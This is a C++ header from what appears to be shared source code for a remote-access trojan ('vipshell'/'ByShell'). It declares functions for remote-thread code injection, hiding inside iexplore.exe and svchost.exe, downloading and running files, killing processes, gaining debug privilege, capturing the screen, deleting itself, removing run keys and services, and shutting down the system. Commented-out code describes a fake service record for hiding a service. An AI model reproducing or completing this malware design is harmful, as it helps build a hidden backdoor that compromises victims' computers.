tools.h

软件源代码,共享。有2个文件

#pragma once
#include "..\vipshellinfo\vipshellcommand.h"

//#include "..\vipshellinfo\ByShellConfigStruct.h"

#include ".\startaggregate.h"
#include <windows.h>
#include <vector>
#include ".\opendesktop.h"

#include "usrlib.h"
#pragma comment(lib,"usrlib")


//typedef struct tagVipShellConfig
//{
//	WCHAR szUrl[256];
//	WCHAR szExplain[100];
//
//	WCHAR szIp[256];
//	WCHAR szIp_Port[100];
//
//	WCHAR szURLDNS[32];
//	WCHAR szInject[32];
//
//	WCHAR szCfgFile[100];
//
//}VIPSHELLCONFIG, *LPVIPSHELLCONFIG;


DWORD GetCpuInfo();
BOOL GetServerEdition(DWORD* dwMajorVersion, DWORD* dwMinorVersion, DWORD* dwPlatformId);
DWORD GetMemorySize();
bool IsCanCap();

HWND FindCapWnd();
bool enableDebugPriv();
bool GetProcessFilePath(DWORD dwProcessId, LPTSTR szPath, DWORD dwbufflen, bool isGetPath);
DWORD GetProcessToVecTor(std::vector<tagVipShellProcess>* pVecTor);
DWORD GetProcessIdByName(LPCWSTR szName);
BOOL KillProcess(DWORD dwProcessId);

void GetExeFilePath(WCHAR* p);

bool GetMyConfig(BOOL DelConfiger);

bool SetMyExplain(LPCTSTR Explain);


typedef HINSTANCE	(__stdcall *PLoadLibraryA)( LPCSTR );
typedef FARPROC		(__stdcall *PGetProcAddress)( HMODULE, LPCSTR );
typedef BOOL		(__stdcall *PFreeLibrary)( HINSTANCE );
typedef HINSTANCE	(__stdcall *PGetModuleHandle)( LPCSTR );
typedef	VOID		(__stdcall *PExitProcess)(UINT);

typedef struct tagThreadParam
{	
    PLoadLibraryA	pfnLoadLibraryA;
    PGetProcAddress	pfnGetProcAddress;
    PFreeLibrary	pfnFreeLibrary;
    PGetModuleHandle    pfnGetModuleHandle;

    char szDllName[MAX_PATH];
    char szFunctionName[MAX_PATH];
    
}ThreadParam, *PThreadParam;


DWORD InjectRemote
(
 HANDLE hProcess,
 //DWORD PID, 
 void* pfnRemoteFunc, 
 DWORD dwFuncSize, 
 void* pRemoteParam, 
 DWORD dwParamSize,
 DWORD dwMilliseconds 
 //等待远线程结束:INFINITE:无限等待,结束后释放远线程内存(用于非阻塞函数)
 //如果为0,不等待而直接返回,而且不释放远线程内存(用于阻塞函数)
);


void InjectHideMeRemote(HANDLE hProcess, /*DWORD dwProcessId,*/ /*LPVIPSHELLCONFIG lp,*/ LPCSTR szFnName);

void KeyDownCtrlAltDel();
bool RunFile(LPCWSTR szFile, LPCWSTR szlp = NULL, LPCWSTR szDir = NULL, DWORD dwShow = SW_SHOW);
bool DownFile(LPCWSTR szUrl, LPCWSTR szPath , std::wstring* pRet = NULL);
void GetNameByFullPath(LPCWSTR szFile, std::wstring* strName = NULL, std::wstring* strPath = NULL);
void CreateThreadDownFile(LPCWSTR szUrl);

DWORD WINAPI StartByShellIEXPLORE(LPVOID lpParameter);
DWORD WINAPI StartByShellSVCHOST(LPVOID lpParameter);

//DWORD WINAPI HideMyService(LPVOID lpParameter);
//
//typedef struct _FAKE_SERVICE_RECORD { 
//    struct _FAKE_SERVICE_RECORD  *Prev;          // linked list 
//    struct _FAKE_SERVICE_RECORD  *Next;          // linked list 
//    LPWSTR                  ServiceName;    // points to service name 
//    LPWSTR                  DisplayName;    // 
//} FAKE_SERVICE_RECORD, *PFAKE_SERVICE_RECORD, *LPFAKE_SERVICE_RECORD; 
//
//void SearchDWORD(int Addr,LPCTSTR HideServiceName);

DWORD WINAPI RemoveServer(LPVOID lpParameter);//RemoveServer
BOOL SelfDelete();


void RemoveDelayLoad(void);
void RemoveRunKey(void);
void RemoveService(LPCTSTR ServiceName);
void RemoveServiceByReg(LPCTSTR ServiceName);

void ShutDownSystem(BOOL Flag);

DWORD QueryProcessByName(LPCWSTR exename);
DWORD QueryWindowByName(LPCWSTR WindowName);

void dbglog(char* str);